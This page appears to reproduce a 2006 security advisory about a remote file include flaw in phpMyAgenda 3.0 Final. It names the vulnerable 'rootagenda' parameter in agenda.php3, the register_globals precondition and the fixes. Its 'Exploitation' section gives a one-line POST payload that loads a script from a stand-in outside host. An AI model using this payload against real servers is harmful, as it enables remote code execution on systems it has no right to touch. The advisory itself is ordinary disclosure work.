Advertisement






phpMyAgenda 3.0 Final - Remote File Include Vulnerability

CVE Category Price Severity
CWE-Other Unknown Unknown
Author Risk Exploitation Type Date
Unknown Unknown Remote 2006-05-02
CPE
cpe:cpe:/a:phpmyagenda:phpmyagenda:3.0
CVSS EPSS EPSSP
CVSS:2.6/AV:N/AC:H/Au:N/C:P/I:N/A:N 0.077 0.5

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040108

Below is a copy:

[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability 
--------------------------------------------------------
Software: phpMyAgenda
Version: 3.0 Final
Type: Remote File Include Vulnerability
Date: April, 24th 2006
Vendor: phpMyAgenda
Page: http://phpmyagenda.com
Risc: High

Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de

Affected Products:
----------------------------
phpMyAgenda 3.0 Final and prior

Description:
----------------------------
phpMyAgenda is a complete web application that allows you to manage 
and publish events (concert, meetings, etc...).
It stores description, dates, places, contacts, event registrations, and event polls.

Requirements:
----------------------------
register_globals = On

Vulnerability:
----------------------------
Input passed to the "rootagenda" parameter in "agenda.php3" is not
properly verified, before it is used to include files. 
This can be exploited to execute arbitrary code by including files from external resources.

Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".

Exploitation:
----------------------------
Post data:
rootagenda=http://www.yourspace.com/yourscript.php?

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.